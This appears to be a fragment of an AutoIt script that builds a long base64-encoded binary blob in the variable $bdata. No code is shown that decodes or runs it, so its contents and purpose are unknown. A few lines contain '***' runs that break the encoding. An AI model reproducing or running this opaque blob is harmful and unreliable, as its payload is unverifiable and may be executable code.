	$bdata &= "T0TJq2BDJNETxfxCgD+UJYReeljAxMwnrUSsfm4mATSA+rUGEpHFoEssEMrUPgPX+HNHhA4BG5w1F78RCFVTgFLjPtQwUUJukQAi9cCLg/VIPHMFUAZ/iQhWkTmRbgFPYHYP8qMZRtH61cddgpWoMmbTsRdCd75GQ9gJ6YO7qvmczrl4SDihSfemgJptBxFNbAAb5IDmzpYLjtOS50WARQtQJUnMDg5oCwqvKKcx9QOgQUdoX4LnOUas6A1QwIzqYWYQP46yku6w/tBvvPBgk7SwR032K6GFdQYQRse+B15uaudbFWLYCPDR99kBUIHAwaLZ2hmoLKDZCaZDxgIMjutBO90VeEO0J1DjoQCDzXDlL0qAIfVyH4CJ3RaCYEPzIrQtcIdIefBFNfHwNPPitJvzx2ouslNoIDfiwf/zfxc4XIYKhVgQQNAGhckXnBKauM9wrjIxpdIgR1WJJDVxEMTCVjBAH4qRf1HD1/FYB0DD3Eg/QWYNO"
	$bdata &= "XppTh8EjojhwIwlqt9RSNe0wxQ+DwJAm/rjtDVHVppdFAiIpqGIyc2MC0LImXW14lJBOt5EGzZciQICWA75Jaykpk6n2jOGCwQOiDfGGZpQyzaAXeIxlXhKe9sLETDCAMjw9jeUQD0Ad4LL2JofiIAP8/jXcwVtoIArvX/n80hRDdjx50GVaTw4Z4DAxmMz1cDWCXlBsdwgBvf3VmMQR0En1cAYC8PbqGGNsM/wF0UHDrKhfO1A0j6DfjpaltSnAsK17wUVJKDxpdDAOq14Z23ok26AL+YAMDRp78K7DiakOYckhInC3/fBzcKSArm/8zvQJZIQYEfxl7+8I0Mcd/TklejEE5d2h0PKX4afAqN5TwIHQtU9EcBZawXgmBewT1+GhdBWvZRuEOHb+0MiDA18ePdzmcHk9/n02FJHR5xj3bpEVg93JvPQkMyNPSSzhSLt45swaCAIUIxCb/IpBoBIPrWY194POliYBZaCj8ggc2GDcBG/JN"
	$bdata &= "4H/WqLuFNQyDo1sA8QkX8LGaMObJP0TRpCkeEZUiVsPw8AMxcN0eIkUZav91dLb0vZiaVQ1uTOtScQ+Pu5l5iUW0+CA7/btj+S4q7SgsfUonZRxY9ve+x+FGVlMYd3lTVlZVGxhJB3vGfDrfSOqzrE3A5CLrZ/YEDE7/Xzv3dFs5rqNi2W3W15lOks2qKLy2Bp45fB1VtjBWtxX0bSf4Ib2LyX/3doEefghQh4OOI/+Ldmw79XWU0ovglesgATloPgpW5RGRAV8IWErGVMShAofTXDaEtFhzNn5sO4tJWNEhqdYtxUklFOAIeapkCyBsGOtukeF1vUvkjRRVIYhU0FXoclYYoBcanOR5EHfSrBdAOpgEB2E4NWrpGPPCkZxjWiGOL+n8kriH2uxQQs0DR/ojFXwmXIuVaME+0B7hlQCE23UhYOunPtx4E0wlDAhzSLpAleBLeosGJ***FnNIk/KwYC6tSeI39OAUF6eGWgtQGQgaPMwlD"
	$bdata &= "MkdJ/EAD+grdTPC3KA5Ic4E4HXWO8cv1tokZnQgdndHQLiBhOfxEFdXCF4CAjJuDDlICe3oFyI5flQPhNehFGgKqYRjyMf1dS5Ndgx7UIwUp17pOQwaDJoHGJgsLeKtcgGKPAeXnGkg6C0zHFT+OGsDQoaH/zQTBQgkAIBWtdVHcYVPIwA6LUtXZ4QjFUjsPQO91SeU2zJrM09UVhaEGGmE6ByYPFIsLDNJ4EZNTDXDw0dOWQe08gHysZEQAiCDoYsJOCau8moCxEdIbGUBvhEAfiHd1AbyZSsDzBAkBQegZzEBdRsaCQm3M5H/tg8pRp6YZU+Tl6X2CE8XPUjtID0ZuFlPMJeBNR2gi91idGEh1AM0HLN/iVGTtgVv3gHo2kUnJGB/Ue/rf8SGGTBDBTtBBHwpiYxhtQj6EAZdHm5BEL2FsWednifjWC+NPzS6EOFWcu58QccHhgP6lHKNuPAe0cEGMKB/S2wOFiIGFo6Buz1DwIl4j/"
	$bdata &= "mTQvYROuA2e2D+lZyL+E4C/+GBS/gIOynIEDBqlGex8AJWxEwntNZLqYBRjxkKWKMFmgwGJfjK4yWRG8fWaJgEXKHTIqt3zi6ACqEpdJl4Yx0U3qIhDgELCHJ1M8K7FgbxBo21YJMBiL3xTljr9Hh5TYyAPhkMmN0uOYB+NlYUA8JT46o8tTleMLjDABVQHGmNXIiE+t4AC3Qcagos+z4cgOzbD1tobCez/OuoroiU3HaXRjCANHUtw4Y9Dql4iQJjNIccIDc4dSkCBIeREMoPG/IuG0yPkUexdTx2vi6M1xAOC0ynVgFSOpJMElAAzlEAE7y+cVHMw47kpNIyUHjsfKMWuhfaORXl/o7CZ0asWOxwS13/oAE5xJx9U1kGLfL2nYRNCtcDwIiQt3DWJRoAz7u7L1gxUOsXLGAyZll7ALM3kLDIFLHtMOwRZAS5vCa9dgY52qDz7KR3W9okjwVEqEF3Sy7Iibhnd7BICEuJJwwpMGwgKDo"
	$bdata &= "ckVC1PMbpHNIkGJyG3YUnqmY28n4wFbweCkgjfngPPlrA3/oTpBaDeExAQEynlDqllGaX0+GSDQElmABogjjL2qGNhbrU+7Q0syBoUMcN74cjnQHw+r14KAK4GFIQUu3D9pWCAc7+CAjcdA0+4mecfhPQW7ZXT41YeC1gq***4AsJRI0xf+CewBctbuhXcEnSfUhXgnch1MR0ZkPE50MqH8h0VbDMdEQPqXzIfBjUdDOg0HSt8SGVIgTYdBEXx342DIMFb6+JHS6Xy+f9C8TIzNAGBbpc1NhOxLUGcA+F5Vr/JVWxIdaAwANWLmyh2x6ChX4bCAx+FoQcxieHiuCnIJx4DA5GBHwH4Q8tVUIANBJCiRj2Gl0sow4nwG+wbRHrSvZFDAMAWSPgJuLrPZ2orgvSvt2NRa4hrOsNHPDCrNfnNo8nrlDaDcnVlfAAMhDQ63g2uFEBOM2kaXTKCv9vcnRggzsocltWf34C30rvcElXBnMIhmHw"
	$bdata &= "FrK8rOP+rRh8Q5TWjXsUjXXwpQDM31oT5nRIKBBQJF9yFWofaCHhzRaEIIPDKABvU3iAegbPR+EIjnMxRNioNxQLvtqSZolV4DfgCCm8TvRXoIuK9eT3fRw7+iAIAAJPCP52MG4P0iIOOVcMaAh2KejE0hAqmATKVPsKeHPfizeDFATwAXqT0uSJdIW82sIQC+JvBFpy3TlNCHMfHvDbZ9nRK25QBysijVSVuIkCAPDXpPDqBEl19a3twL24vgPENEUYriggIHR4aLoAF+Ag5f1Y/khcBBoFmhOqEg+HmvYCfqV4ik0YagJat1eu6xYhoE52KSyHQ6vgi3UAA3D8Rs1rINRTpWR1MEACCNEhEitFvAQDjG/V7m0DVHSGAy7N1zOpG22PjMpYHuReTWmCHFjATY8DhRPAWBhS1/5lgizEU/9RYNmb5iZ5kwN+HBXvh0PwHnJfAXXAjXFQsmCQB3JRXAW0TgMkboQsWmpm98FOhdtvOCj2w"
	$bdata &= "Q90IwgMdBlBA2Qb0EK1gGbIDtfg+vyDwAjr0+vOrKYhetnTzLbMv97EBvj00TmUvIJYa+UCqQAz7IBgZVSTAVA8xUqbTSAhwQhRKdnQ4DNQVsPxA2pQTAq5NmwbSIdXcGeC5URrL0hkAz/cNgZmqTQUqAyd4/HR3AWoi56co5QbZGj4Zj0MQHVVCBo8ldkOTQgFYQ9WQ40GERJePFU/CyMNruD520BTaa3TTaaQATxPhRUcRYPSTTjrsUsu2GFHND3fQma/XDCEynQlVxGOqju+LOt/hAR0U7YIytcqo8noAOtQfdDRo8kFhw2O+3KCAryjMNBRUWwp5MjBADqQAHHRULMoncdlICVU8GlwXStVdVYjKCxeySN9C9aJIYKP3et9MWiMlAya2mAnXD1EsAGt61MtJOsqCXZHzzUvKCDFfCVDI5eBtQPCGzkcCAkopTWCAC+iz/sb6AUkbVMLBiyZnufZPOZUT5nBzzzPs3ndVQWHr9M8m2"
	$bdata &= "fz91YfoFc4YPGFEfF9oihd7QasNmB2QjTGRf/GPHjBpP+YM/b/tgAHyRiSEmoreJocooYiyMiFAHAu8kYYmbf/ZBNa/kxy1oB9ZHQPQ7AwpbY7hnK+VRQBEh7G+ijygYRrrTO8floI42leMAwMNICYCwMti4jcLEDTLgzNBERIQiBdAHvJixpjEf2cCktCv4b30SPIC00yELiY9kArUT0F+BjMvYIYXO7IF1BRATUDgwE1PLA4KMiMVVWAsWRif61YnMIQM+yrAYM6YCBwOGBgL2Jw1P+gCCgXFIFGUECzBhTjIPOtQszRayJ9ifcFbDYnZ8xsCAFelBEQKuONQUDx0K0D6CC4hgzovhes+PdTV3KL2XdzoDf1GAYQ9u9OMDJXTtugtPAXG4KDq/I+KHJgexOhLriDTgQBBiT/ToQRZneyBj5kkPKprE3BfoZ1B4FGOEq9BV3sXpFfGLeRWICTKrW1YUlqyIN7av9fgMY72MMY6/E7UwR"
	$bdata &= "19jtLSSmI2whyEksMd9ASB+mKWjP2xKUhoDRKEAA0ucYfq038UbrO0w1AvQi6KQZbUOe5MywQ6ATsccdgXskGbxFnf9QuWkgI42lAlUlE6jxBWnsD3s3JcSCYCuAmNXQIVxl3GUvYCmoCX2oIWAU1pC0YQ02gHAU8pgaOZ4zNTcuThJ8JEwUlXItXAcJQkbFQ/wp/CD9bmF65e+DjS9wYeA9WV/ZlEIl7BNirS2RILDS4Ha7LDTF1ASI0j5kDi0OgMwgM72ngpSiEuX/kavytLt1B2wWvLEwCHKGBbHw8mFHIwJYGZB8gHDiP2lYYV3QcjbmgHRwgUiTSFEGGkqFkKCwwZCgZSjQ4Z92QoTw9IEo5JM/tuRVSKItAGJBpmAxEmUgWZCK5TFA+y+32BBAxSyRBVGXH2x5IiUdgFI39ntJjEKVcWFVYX7UMFXwAIKdcB85M4CNNDAtUYJMXCEaAE2gcRQYKnmQQj2h0jbE+mSwmq2g07ac/"
	$bdata &= "YwoUXTCeCuAN4lWaUWg8gvqITEoNh/Aa4BwHmCw6iwXep5WuSwEQ+Av6gK45ARSDG2r1SGBm4AXhAKw5yQFIKF0RFcjY6FvrPIPgEMPbgaj3QhCeyz0C4HA9AQ3qWZsB6X191p1yHYYsqQgP0KuhKxBp6DWMIeSRXfaJdXXWgaYyaoRmpiIWQAfcgfxvjLgKA/Q1K185Zi1AV8sBKa5mOUUFIiQ/K4X2kC2g1M1bXghBAZkpJFUsSg7IpF/PIAclEycooEAmAHlgY0iapl2uPzQEMCwowaKUaSR5XQDkgQycYRJruQKZaB4lB8Fq8xugWrAQQu2qJAULt3IRZQK+kSDQdAk71tsEvClAThjIdPNRww0V5dfBPV0I7g8NqQSXxwYbKLEQVqdSi1DiSiSHKI1ZdwBbhHkGI4VMuCF8zbPlUgahARkWZQBmQYiOB3pdzH14biSUiFBr9DSNBMUMHhTftvEZK/pX+FahmXWgHlNcSSCRGGxpm"
	$bdata &= "iEgFByCARsg25WR1pbDdkAPbkBQpZscCeYADCx1i64F6ZluEhcMENJIG0NdUHV1tRIAPHQdzBkSbus2e8wGav8CrYS5VmSnGL1DWEsQOXYEGxubaGtFfjX3mIZSrP+f6T0eg0ISUipTk2MY9mcJcBjrDldnPFCKvwjsD0c7fQh8zjyIfxRySwvHduvvT8Dkl7aACPuRklMByWPYIan/iBcEg3hsAXUtuQrPz4Lmag9YA8CoJB69Byx175c44qwWTIxSeOsPFZGqHBqeDF5MtcSN8yoxB2a4SsgSQAcrPQ8vge4w8WYZHNlaCCoNxkj3CCd1wo5o0GgBXxuZagj4M5ZdhuinnuyDxtChpN4bqnCDDdSaPIzFEWrwHPAIjBT4UnXsB10gL5LZj8rGSTdKIBPtOJWZSGYPqJueDCLTlhzpEJUokXxXAZ1WtlIqIkRwMiQzUzYwjNxywVPym66Sk4kIVpBpRo5AeV1zVFK+pMMciwMLOUrazQ"
	$bdata &= "yLy6WylBgCuQg5nJgCuQg5v5wCuQg54qCBXIQc6gWkgVyEHCiogVyEHEusXDKEHG4g/ygZpMBsELDkIuTkHJG05KrpCLT1uLlK2gKa1/8/vC4iOAL668CRYIdA6x2z5Ah2RFPEs0AKfcCrGI3wFKWZnBwl38XIJGNDIFNx08zrIpghioaDFA/JUdKwJtAQ7SpGyamJ1K1FHCdHFMw9i9gRyNjvs0zDIZDc7BK96GkJutDM4441MgHyIsZJWG1BF1bjmnuSqwoh/eCyHACsD14staCQws8nVv4ZKcit0vh9RuyJB16XijHphfh2yQolLd3UASIGMEMA+BFg2U4rwVveWUcg1pJdjQWk6zv3HL+CVpiEC8upAzCsfAQZwE8W2SBNZ1lrVwIy2rr/LaF8jUXIUF/Tlbok4FI77hmAEVRATG4GPcGd1DjHRaC+pc4myTrx0Sj4Ej28oBC+1xBiRFEmC5EuoIJw5Ri0wveZGaHYSBPo61YjCml"
	$bdata &= "hNb7TqM4Eu2NraUkVeests85pGm+bBjkm6Oy7U5iB1ngRU1X4kmGNEiqLHOwB6YfWXcgDwSkr+7aEHw3lVeTgk2T8OCvIdEXMvkN3C1/cA8Iz8KIO0f6b4deigDtN6H22COsPMhQqGdbOV7G9gzhd0ANdRMs72FsyDXzHbQrrE16uO0X0fgmbE8DfFit11AN19GpqAlZROpJOYXKfTxApwFipn8VEtqgQFKyJtvjg7xg8IWwI4O4H6Eif7J8hdQK5VGIee+eAli9ZxoxKuMAaGdvJSaYSNHYSB5P4IOnAgBbW7CsN+RDTEItOEGVqBD5lY9hoZeTu5O4NTVVn4NbXNHxaERK3cMx2qEPCQJBowEclRaiNJINxJ43eqV1H4ALX5MOZkJMHOxQgFGNSuaQUGPg+xKUuSn2lfeQ7x6TARVQ4eEjYoASFcXFuUHSVQyMl3yDQpZscuNlyDegaRCzr2S+SpW8zidSbK/SYuIk/GYNiBFZXNhgH"
	$bdata &= "sUvtBPAJZuNraBH0YkZRz2CVRnCJHIKR8tJGWPvPk97c/v9wZIsWCGCLzlz/khDCKi2VjkQA63dGA+BD21C9Sh1tj53gEE/LJGpu2N1XTdwxCJEaNiDg3loS35+dCHCtOHRbXEG4nKdTSH9GOo7Dst9XR2wtNdJyzPnwJwVJGx8CMFyvT0yZ2UNi821I3JIAnW7h0ggc6bBnCVJx1rOfIwR8gFKNTxyQ7ZKRBKcmiTA6SgjgobXTbUSgAlogEru38AGjUCCNSNcHANG+eoNmIAAGUDthMFYUE7NNgI/WdBKlCwnYduAggHjagV5mChmtexlI+LmfRpqNTDHyZsABl9ZMAKXqCazAq4gMlaOEWmAzCbEwJHhLDy2myEIYTRFo+3cc9N9QQ+EZEzt4BHUJO0rdo9Joj1PRiV/Q2gy1IFQk+l8kHDgKhiLrAFDWExo0SkgimOMbmIYDUyGEXjx0SY2PRJwReDxOg38ggWj6JDAwSNBqOpa0m"
	$bdata &= "Z8k2DJ+GHeSLJgFBNhDkHUxxxrFXdQPNHAffVIxfBhKwGr8+4Wlar0TpCwhrBxm7QY+nyGY+woLZTLXx3O6RT0IbyCQYsMAS+ktrSBFhf3Y2H5QB0QYplelpiLcxFWvE4fQfe5gLVp0GGUJWdJYaOrIgE5QV8CFwfms57cDnZQCavT4wmhrWq6dIvR8oi4K+VxKLTJYa2Bg5ibILZynehkIAT5MhaBwITAd7NRjGb9NLrcQ/oTeIy12K7Q9hFZ1B93rdiLN6y8NZywmhdcPCrjY6xlbD/Y7KOAKgf+fQoQQTok36yhWiTAYb390D8b26W/gbgCpGjv2dA13kenCZbzUrF5gTVEa5+v2OwhQflV6kWRglxgwsIUdk7wmYKjTqkybzChgFfu/2RwrkyC5XkaJD0dtoTs5mHn2t6qg1xYsahERI2oSmUpjFWgPdioKaBBfDWvq6gNAhdl3ROAiBYBUBzvwIFzi6yNB09h8cIOf5El9BOvZt4"
	$bdata &= "zzQakIGWMQ/DULUXbkjdhlaWIZHBtO+DZuHtm+IboKHlVQeDYtfFZGCnifdh/XeOZXAh7DMTGNvXQaQEImh+QHi7E1/MuQhxwQOVEv2l38usEfbjk4dBF8VUN0Jot9QwLj1yF+JcA/2Ebug3VoFGFw+r8xxudAYOz7agw9gAh4iT8Ri/dFEIZ1aUwpDsYSFVNmjAhwIl8jAGiEHngIOz4/kU4shPzAdTeZNhHEJ0efY6rPlJsXjRzCbyHh/+a5bpWUjcZGiWo4gO0GBUZoNlew0mTslsw72lI7wjcbDV8HQ1hqVPBOvPOlg1e0DogY/wJmLgJeiYlaFIlDYKqJe1yRdVLfEGSJVfx1rEzmKwYchdSQYAhSQNNTAwEOIu30wtACU2JhbKqY0kMCZFcOi4jtjU0sdTjce0JVw1F4EimxWFCruoAasi7HbOxNHiFkgLyZejGCwZEyPBJUsUKn4I17WFZ1u8CMijFwZmDWHZXDD0s24V0XjgB"
	$bdata &= "YABR1EmlQNNJ2NhPrECNCnZnbp13TSjJ6IB/H7Sl+nOE42cCKBJQTy4KRIiwPT1y+vAlIdBWgdA34KXNwEWF1f01QGAloJI9QKCAoiEbvyI+JaBKgl6Q/ba2TPgFFhbiuJE25UJcJmvY5NBiseGIaEBtwOxXgICbdkK+/iWJqMhAQUhCB0y5TanYE2vayMsD+K/o0MNo0VW3P8/LWhhN0twXUpQKMq328tnR0WKO5xpLXlcQNSIuvw7D5NBweGF0Gnz04Zk9JbGkJ2XuyXq8k3RGaJfB84MwLe7zzsIEPzIEdCAtRKMNRnF9qkB6KUQJH7SRJ/voRWBXnfX0YBPyAEDB7FXNw4FS7fDopm2LpUaU0VD9MZOqEEPt5fXg2fxpYsnAc0/oTYVcYjyWShyV01+AtwDP6DNAcSCQnuxYU+s/BV5bwVvj28PiAt6D09xz7kdLAwAAZb/FV0op7OHqXkgpcRSnfJG4dZvYBkeSQ1BUIbG0DlmzA"
	$bdata &= "/ny3f9mDGBgaUgRm4aCr40ftCK1WmfSg3MSeAYBJz8gUYxs6hQrL4TwIXAhYMhFbXSA45BmmrGEoIBp3CddQXUBg8SQr2nQK2Rh/Si4pkigsSi5KLjA0WC5KLjg8S03BQP1mwwQ4regIhSw5noEgbq2JbhYgdPRaiekMhM3CkfAQLVMUj0RLJRMhV0hM4V0gB1AaW6YYrmoLVK885maaSzAQCBR077A6gO0YdOqfc1CwHbcFJK+XTVFMwX2VG1Vc0gxb0oUcgR8U3OlBHRIxCAg1nOAte8YF3MLBMBZhIF3GMi7IZDxTQNjgzPk+Y5GMCLgHGQ2aroIzKKAlIbOhXAoKKCSf3mqHR1EYGm9GHNXx2vlvGF0UXcngSg6OrQwVDu/dO/xJDAtQEBrcSj6ScXqXNmnhQG2dA7AeJRi8hN2++KfkMMwKL7QTtBBuIfcB2jxxFV7/oCbpunCiWRa2kSpYCUXqCgeeA4IMNjgvN4YOrMLJOQjTT"
	$bdata &= "JRIPpBKDBuy1IHNNiR/FdRvKnJ4xrkACApQ8x3ryeh1ODZEgGFHrygILARtPBNCYnUrOFmAMAnYaXUPhY7E7DEw69q9l3o4oI3BB8YQEHCR2YXCU8GbOEXOt/5UblMLgCR1MXtlfEFjag1ajl+BOpWSFB+JfX6imanYJFb8t0ZOjPgk9DTnO8NxQlNPgNyD01Ndl4bhWg/Gyp+oRqDrxiYQV553ogqHJG2EHsQzUSHU+bcmqYwW8/yYYwRnCbkM1UcgL05h2NExPlPf7rLtspMUFKCSToHJAZMqtE5OAEz87BaIgDeArAXCMSMnl1kQpgPYgwOmDLonAaMYwOsipfHIiB/hCWoEMd6IBbs4F4to+lLv7W21hYMo9L8a0wjgea0Pxwfg4zIKFg0ODLtbMJIu0psSVhZJz6JxW6BMbKWPixCwj/gmGwoxJI2ykWt0GgFelzIE0qbNgt+dwxDsCnZrO8YR/4O1TrCiveyUQt/4BA0FXoDTtI"
	$bdata &= "WMhIwMbBBxGPjUVJh4WaDXVqb6ZzsRyHw07TUvFA4ICBJA1FK1LZAM2yR9QSDleQzCayzLpTLKy7quCUMlfh3QBJpAcG0XgdygEA5p3NJrDA5GI8hoAFiDDPu6E/YJxczkfotdwBR4E0ZddQDwGJeII5yHPmQ9avJpwANeBlZvCPZ0uDM+VBYjU68DTZSJ/g9gUPUgVVYehvcfsMpTz1F3LFMux4ogNfUNWaPwFkJ19xaFPbi4At8F3LJhAXuX2TLy4ccBY0FBDOBhg2NSwCEp6Xrsvg4d2OH/QKYUiUwYSRQYpKgwFBT80WuHleFwxQnA0YnRcfj1h2nfve2VfN6ICoNspBDpOjwOqVSOEy8EWjxiYLlNOxAFTsdQxtJ5WlOGj2z8HYXIyHRLVu5eabWeEBgvsc6nZH+gvdh0KjY8tarCLFx0IVrrBh+EfZnWDo0ePmiBFanUbgNUczr/BwQrezH+VnVlgX1TeQ/UEAHMEhAHCRMCn4z"
	$bdata &= "SdUpgw4WukN7YPsMQJRUR+R50KSMMZuBmySzwUQ6SAjuGUziX1lsD5enGQGfi6OcyFgx7zC+Eg2XsAOCAkxp6hEahtAkDKtAbb7fT5qAQGnR6CGJ0US3BJws4+stXDezSK2nd0Hcq9FIn32heyOiaCjg0c/6o7IfQXNpJbrzsbQEglG5G6NU9lnDBEYD5NBLezmiv6z/TTRSCDdrNzlEPvw5R4YlBRPFMiUalw3LoRbh40VeI8A9WvYjLdJIYpCBcBSEaTWsOvPSKPawUtAoMuANN0zQQvBTANCOFMqim5OTsH0l/8uSKQcNoSBntihVQESMQBOuwgBE4teBS8RDAIsHhcBUqyaEpqAOKBxSgRLCy9Q8uqCjDJo1Miz6LcGbqBI5vULZgbn4Djp/cdRX3vuGbo3Sak9UOkwVs8b2jMGRLauZTh7A0LhCgotM4diIobb+Bt5l3GGoFCg+3IFDGfbrXkBDrMCTGgVTHVSh7ETHj2j9sroJA"
	$bdata &= "RsdmeBzY6hEwHNFTC4F1RMBLP1BfvpWiKR7qVoJA+IcPVFQH0ALM14PLnnLUYBRZKrTgE7B4xNsRbxA22NUaZn0KTDBqMF5WIRuB9I2FrP5bGxrfR52MC1BOLFhWdWDcBuAoPhBmo3WwoAsQwuDxm9S7m/RmOwUpdTDremp2CeDv6UHQkPgwe6IjVgrnAITBA1jh/0yAhFpsBMPVPBoAM7VJhDtTdSnWNTqxxBQ/iCU7TJEQiRQkUcQYwxcFW7uFAP/zi70DXlEMoFPId7mDvQ97EiyPEA0n2INnYDUDgCghsThsnANG1+iqpYhvZTl+FHQryyJHLL8ihYsFagW+4UgKsyhjK7XWAHCVUTBRPiM6S4kRNuAOlrp0GiEfCfz4OhOmPf3wChi2aZqm/RUgCuQk4CgBkYCm3CyyaF4qCPSVetQwyqEaynrCNCMEXis3ZLoOZ2vYqggETvWNVIzQBHF6NU3U2NwsyITc0uEmtt7QopfhLCP8y"
	$bdata &= "5jXw6GUpqbp6JThW9SSCo18WKIPXCwus51buAUhT3Auy/VlFUT2sL1grP8/H5MOGQ7GAbsFtDTSiGUEV1Vgw52fXAScK7p8650bW8NqcNTS+RgO6gCk8OAAulMY/pqB+xE61tfiQ1QyB5iQJut8ZfBxhNLo7JD+mQHuk/mD+068TRBO1CEEirZvI60V8I1V8FI7z2rshYS9mt+DBF2REgbaAusAH7g1wFfXMqMQLlQUxkIOOFCo0r/SRvVjuR54lA5oTYN4dBeUICBUA3PkfdpyCA4JdhseAQ8BeEcI+AuNg3+/EHccixzLoEAMARWuU4JgnhQSlPkDgEAEPJ0oMNjzagAVsE2uEIHj//oJ/A0C1WvbfoHDJCwCPpbAOwNmdS4kmKmvlMM7SCxAr9AJwGFdsmIEPQSYD4TAfluK6PAOckUn6wxA27etBGACWAgkkPpBlhH0E7JzPLtQNL7V+/Z0YcEUeO6+QbGrmsy+FSV03hDzRA+HRA"
	$bdata &= "PqinFfA5QeNgBomVAXra4RoEPNOZBXBL1sBQO7M3hTvYE9eIX+ddoY/xMUaDVYNOCDO7xwzkRmgLCTPuPTFy8WwREavxLB7g4QEAk+FGAahwav8pIx9une4//TI/br8htZvKJbqRdnl7fGx7UflpYvTyXrp1brs+7YUQ+PCTdGAISTobBa3E6/IIHmOYBeIgKkqFKOm48cI8qkq7GwAJEojoW/F/CNRYRWEtGDZdxGcqPbIKQApLir3+xEwNrrJN0a1GNwl72onmtcRl5HpzAVo5zLwM8ECwydwaocLJEDwmGTdh8yVsEQ/BJzLevX4fneLB3Wug90X0kqLs1IJf7nIT4obGP4G5Nz7x2khVlIdyAZhusvFjaw7xPu6yWfUC1bFY+9HesBjetzzesKx3QrjmIrZUFXPZoLeBD160VSWNEotSYhmMoqEMmjVFlDtCefuO2Owf3rNVFS6wSJA1YT639LrIXhmFYDtg75RWtYe+1cbY9AQXe"
	$bdata &= "T6xYXwUxFbheLZTX6uvB0IcOyQQ+EnUlMlVsUoTdMlZEgjTLwXrubiOVAdyCQAAg8Bk7meZ5LaISPks+3Pc+SATZNNy6T8l137eR5Dmp1bBd9BnZJW56Nnr5cU0fP8zzvrAbJ0933/PJuz3s2BQYQJVcxBkCSdnB2d3eToQeeLMg7eV83fj6Nrgb90rHcRdGnRxUEHuhguizKd7MwseJsdEL6Kw//EDWN5nYvdnEIOXRsTpCVHkABikJQCNrDScABggIudUJ4jr4NGm7x4Y+8izuj1pYOnjpxMfkupFY0Eb08bSf8X5hYIDvOdGWJAethPXAHCC/wciQ9FcIHPbiaMDxDohQulQlklkI900L4Jb7rNo2QznL6Bncpg85cEEhqSCFXEIruW0F63GgZaGb4A+kb/2E5N191tsnkDJFQgSXauP8NBR0lrGg/quizkz7L6YaBahRCQbQcDvfajpppXKT3mU7APqyDBBOS3gZuFgyr3+RXIQEW"
	$bdata &= "Uz5XjTX2BHHK6xkrTeApq1H4fZaaw5WLxw4DhMONB94G0QQAYPJAIwXuGugQNkoha/U9qSFgEITjLYSsfDVDBIFYQxMRQljvlkiID4jqqe5KPQwEE4r/BLuUEmkjGd3JjobXPAMIJyfBdA6JBCLrA4wI4AwGu2gHYmCqzn734vkLfFYls8mWseltRmoA+yCD6+fzCP0udHQ86ouFjYbRw0UMuGe0gcapoSxt/P4GXncxbKRvE6dCySE8oPA87mqVLoRViux77pA8/L+4FoWXbKNcUMBAyg8gYL5s3obdqajHEWoVlj8zfAIGmIJwwAxOLaSmb0eGUkT7VaM2cv8RkilijVY0UgZ8ACJoMFL+58lCGhTgLPKR4EELC4aYewEZnCpQ2b50HU8TsJT8COsVUEB8qjhwuYGQ8DC07quEPSaCYSQEXg9AfNpfcClNU9EBaNBe3YxZf0ACcBwFlzKKkdanydsXTiSNcEEbLuuzvjrMDH6RAvhcO"
	$bdata &= "1WXgiVYbWHLI9spxCQ+cXehAbwuniSflpIjVYkwDH/glB2klLw2EoPrCUCyi9cYPdC7FGiZmn4MNHMBNIs4SkA4IdisP1DyCN+dODBqKIcGWGAKzMxXOnUJNKauobDaHA5RoPZv9l4BTGpSod8XaJNeGFuiiV30dBxqUMdXIWtsBgsAIdx08Z3g34fmAUZqIHQegU2EOm9RkO9RQ7g+ziBGAp/Nutx0ITnczD+ADEKbMZdVn2tNAgR0rgF6e3fxYL+UYV3MZpJ4xUrZCm7/BIRdCHQnaAJJpDelDn4innqaOAIL8zgQfNpYaGicTvT4/9F3Peq4a1KBZQg/wN7ktog6RiJqQEEQJIf8l3qAdBdogAACEmQOxLg7QpFjB2diOE74MQITYJLbE1BrILv4OPMkJ89dUwG/AAhsQG7PfVffQBCtuJCBXQQ5IIBjD2QgU0B9+N9ySAqWgIRXAAEh0wwSpzkCNWADcgEE15tAYIN2CXF6GLoXU7"
	$bdata &= "8WGDgj+poJg8jNlMJUNiSoEiNgLKBtaF8rBl6Z1EpLFXAEjw4eYuniXqhpYvmGwTgSTAkINfS0xhOvYYTDhEcZpggEVXyTIKPgJXR0BUB2BPDY2C4k4g8DDaPL/wtXkh7/XRkaePYcTghjcHQH2xXxS8ZqSnQWBQfwKJwin/tBnnlpf3uDyP+2tl3IARQHc112JQexY9ekW4AQ8i1IFbmsrqxAcmz5xaI2BjEBEIN1BAKqEukHYHeiHpNPCK4S8LGEDKP/NgczAQe2fy4pV1fgiTD3HIT0w+VyuXwKhRAsSGRcLpfLgJy41PCQOymshgxzZ0wybHkIClgzmPDe1gmIuLBONwQXEBOGZECEWjCdG2f4WF1bMUh01zbkxOQROyVW2hUxOogZeSgZKDlMUK1DWB5UdBInyRSEtoUxhRSUDJRcWFzCSJAMYJCAo8j5v2QRfdC4BHTwUMfopojGDx1QhBJ+IpU1owQk98e6AeFX7NWNXwhTEWr"
	$bdata &= "gJoQtCCzC3VfUC4kPiQP0d+joSE0TWWkQuRGFxUDQagg1lo7aDQs9C8xMARbyrRNtD9UKmVtrgldrTiEnbjOGLIZIyFZGQqfu0CdPgRwcAmoEojFyIZs5hSwcHJXR2gr5WKCO6Ze5dtKGC4Dj9UyCMBw3QlyHiQsd3DAYjRT4BKEM8XcA5RIvCV/MJq+MNQRdFAAL4yRuUsahlmpeBIxVyOH3yGWEK8cBwbIjMZgOMTvu8x0IAxtyMPE+OBtmBnmb5GwoJD2KmiWtZUH0/7wl2Y0g6afvFsTs5pCBj/d2ibicQDmMb6OcHe85yQN5lIdkA5AAOSFHXIdkyMRROQCBZSCkcskVAVWAD6RZhiAgpNNADnIkGqTTLOQFx1Gk04yAHnBDpX7VWMkPwsOVo5wA+BZQHVWcC0bCA6vCAfj1+joD8S+I8uecG9cPYBQDdART5xQE+MpMVnHdXQJbJReci9wCyAlppAk3mCGHOAWJ76QpJQSHOYdi"
